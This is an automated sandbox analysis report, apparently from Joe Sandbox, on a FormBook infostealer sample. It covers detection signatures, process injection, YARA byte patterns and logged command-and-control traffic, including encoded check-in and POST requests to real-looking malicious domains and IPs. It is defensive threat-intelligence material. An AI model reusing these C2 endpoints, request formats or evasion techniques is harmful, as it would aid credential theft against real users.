Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8mmZ7Bkoj1.exe

Overview

General Information

Sample name:8mmZ7Bkoj1.exe
renamed because original name is a hash value
Original sample name:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a.exe
Analysis ID:1528955
MD5:cce5d60668494a747ca41f5d8b17e76a
SHA1:9f29f6cad0687318f9ce75c0145b68914fd0e422
SHA256:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8mmZ7Bkoj1.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe" MD5: CCE5D60668494A747CA41F5D8B17E76A)
    • svchost.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eKxwLXHhqpgy.exe (PID: 1904 cmdline: "C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • makecab.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)
          • eKxwLXHhqpgy.exe (PID: 1228 cmdline: "C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1416f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1416f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2410000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2410000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x166a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2410000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2410000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x174a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ParentImage: C:\Users\user\Desktop\8mmZ7Bkoj1.exe, ParentProcessId: 7440, ParentProcessName: 8mmZ7Bkoj1.exe, ProcessCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ProcessId: 7508, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ParentImage: C:\Users\user\Desktop\8mmZ7Bkoj1.exe, ParentProcessId: 7440, ParentProcessName: 8mmZ7Bkoj1.exe, ProcessCommandLine: "C:\Users\user\Desktop\8mmZ7Bkoj1.exe", ProcessId: 7508, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T14:18:23.711338+020020507451Malware Command and Control Activity Detected192.168.2.449752156.226.22.23380TCP
            2024-10-08T14:19:07.778511+020020507451Malware Command and Control Activity Detected192.168.2.449883176.32.38.14180TCP
            2024-10-08T14:19:21.281956+020020507451Malware Command and Control Activity Detected192.168.2.450011199.192.21.16980TCP
            2024-10-08T14:19:43.467409+020020507451Malware Command and Control Activity Detected192.168.2.4500153.33.130.19080TCP
            2024-10-08T14:19:56.641348+020020507451Malware Command and Control Activity Detected192.168.2.45001984.32.84.3280TCP
            2024-10-08T14:20:26.593067+020020507451Malware Command and Control Activity Detected192.168.2.4500233.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 8mmZ7Bkoj1.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: 8mmZ7Bkoj1.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 8mmZ7Bkoj1.exeJoe Sandbox ML: detected
            Source: 8mmZ7Bkoj1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: makecab.pdbGCTL source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eKxwLXHhqpgy.exe, 00000005.00000002.3560737950.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp, eKxwLXHhqpgy.exe, 00000007.00000000.2224546408.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281C541 FindFirstFileW,FindNextFileW,FindClose,6_2_0281C541
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 4x nop then xor eax, eax6_2_02809B10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 4x nop then mov ebx, 00000004h6_2_045D04E8
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 4x nop then pop edi7_2_05636CB0
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 4x nop then pop edi7_2_0563604A
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 4x nop then xor eax, eax7_2_0563A853
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 4x nop then pop edi7_2_05636008
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 4x nop then pop edi7_2_0563531E
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h8_2_000002469BF634E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49752 -> 156.226.22.233:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49883 -> 176.32.38.141:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50015 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50011 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.impo232rt.xyz
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: Joe Sandbox ViewASN Name: ASBAXETRU ASBAXETRU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.nad5.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficHTTP traffic detected: GET /azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.impo232rt.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficHTTP traffic detected: GET /6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.cenfresh.lifeConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficHTTP traffic detected: GET /paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.digitalbloom.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficHTTP traffic detected: GET /pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.thepeatear.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficHTTP traffic detected: GET /oigd/?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.crowsecurity.cloudConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
            Source: global trafficDNS traffic detected: DNS query: www.nad5.shop
            Source: global trafficDNS traffic detected: DNS query: www.impo232rt.xyz
            Source: global trafficDNS traffic detected: DNS query: www.cenfresh.life
            Source: global trafficDNS traffic detected: DNS query: www.trafegomagico.shop
            Source: global trafficDNS traffic detected: DNS query: www.digitalbloom.info
            Source: global trafficDNS traffic detected: DNS query: www.thepeatear.online
            Source: global trafficDNS traffic detected: DNS query: www.mktimediato.online
            Source: global trafficDNS traffic detected: DNS query: www.schoolsfrirstfcu.org
            Source: global trafficDNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global trafficDNS traffic detected: DNS query: www.myjiorooms.services
            Source: unknownHTTP traffic detected: POST /azcx/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.impo232rt.xyzContent-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeCache-Control: no-cacheOrigin: http://www.impo232rt.xyzReferer: http://www.impo232rt.xyz/azcx/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 41 70 50 35 6b 63 73 65 6c 7a 2f 74 67 34 43 71 77 31 6e 49 2f 50 64 76 49 64 43 63 2b 73 44 48 6c 4e 65 4b 45 36 4a 34 31 62 48 73 70 62 51 57 72 33 62 4c 56 72 53 55 37 30 42 5a 6b 68 31 35 67 4a 6c 48 37 44 61 4d 51 49 6b 34 77 6b 31 4d 74 4c 6e 42 77 46 46 77 76 74 76 2b 53 35 6b 63 66 32 4c 42 6f 2b 32 41 49 4e 4c 70 2f 58 45 69 4c 71 50 38 54 76 4a 54 4e 73 7a 48 61 62 6d 47 61 6e 6d 37 4d 6d 63 52 31 71 56 69 57 2f 7a 47 4b 4e 5a 76 4a 43 75 70 56 4e 30 46 4a 59 6d 67 34 7a 39 4e 52 48 7a 44 76 46 47 45 6f 4a 6b 7a 56 71 64 69 69 41 3d 3d Data Ascii: nrs8j=vpk4ZW98F8zyApP5kcselz/tg4Cqw1nI/PdvIdCc+sDHlNeKE6J41bHspbQWr3bLVrSU70BZkh15gJlH7DaMQIk4wk1MtLnBwFFwvtv+S5kcf2LBo+2AINLp/XEiLqP8TvJTNszHabmGanm7MmcR1qViW/zGKNZvJCupVN0FJYmg4z9NRHzDvFGEoJkzVqdiiA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 12:18:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 12:19:13 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 